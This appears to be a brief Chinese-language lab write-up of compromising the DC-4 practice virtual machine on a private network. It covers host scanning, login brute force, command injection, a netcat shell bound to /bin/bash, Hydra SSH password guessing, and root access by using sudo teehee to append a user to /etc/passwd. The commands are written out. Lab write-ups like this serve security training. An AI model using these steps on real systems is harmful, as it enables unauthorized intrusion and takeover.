靶机实战(DC-4)

    技术2022-07-11  82

    DC-4

    实验环实验过程信息收集主机发现端口扫描服务发现网站指纹 漏洞发现漏洞利用提权 总结

    实验环

    靶机:DC-4 测试机:kali(IP:192.168.186.128),win10

    实验过程

    信息收集

    主机发现

    netdiscover -I eth0 -r 192.168.186.0/24 nmap -sn 192.168.186.0/24 arp-scan -l ,arp-scan 192.168.186.0/24

    端口扫描

    服务发现

    网站指纹

    网站主页

    漏洞发现

    尝试爆破kali字典/usr/share/wordlists/rockyou.txt.gz;用户名:admin 密码:happy 疑似命令执行,抓包查看

    漏洞利用

    修改参数尝试命令执行漏洞

    Nc -lvp 8888 -t -e /bin/bash 反弹shell

    客户端nc 192.168.186.252 8888 连接

    提权

    /home/jim/backups发现曾用密码 python开启一个简易http服务, wget下载

    Hydra -l jim -P passwd.txt -vV -e ns 192.168.186.252 ssh 尝试爆破ssh

    成功登录,在/var/mail下发现邮件有用户名密码 su charles尝试切换用户登录 Sudo -l 查看可以root执行的命令 Teehee修改添加用户/etc/passwd

    总结

    登录口尝试爆破,进入后尝试寻找漏洞,利用nc反弹shell,拿到shell后寻找用户邮箱,曾用相关密码,进行hydra ssh爆破,sudo -l 查看可以root身份执行的命令,结合teehee命令修改/etc/passwd进行提权。

    Processed: 0.013, SQL: 9